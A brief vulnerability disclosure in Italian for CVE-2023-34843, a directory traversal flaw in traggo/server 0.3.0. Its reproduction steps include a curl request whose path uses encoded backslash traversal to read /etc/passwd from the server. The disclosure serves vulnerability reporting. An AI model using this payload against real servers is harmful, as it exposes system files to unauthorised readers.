
Divulgazione pubblica per CVE-2023-34843.
Divulgazione di CVE-2023-34843
traggo/server versione 0.3.0 è vulnerabile al directory traversal.
Passaggi per riprodurre:
Configura traggo/server sul tuo endpoint/server. https://traggo.net/install/
Effettua una richiesta GET al seguente URL. curl -X GET http://localhost:3030/static/..%5c..%5c..%5c..%5cetc/passwd
Visualizza il contenuto di /etc/passwd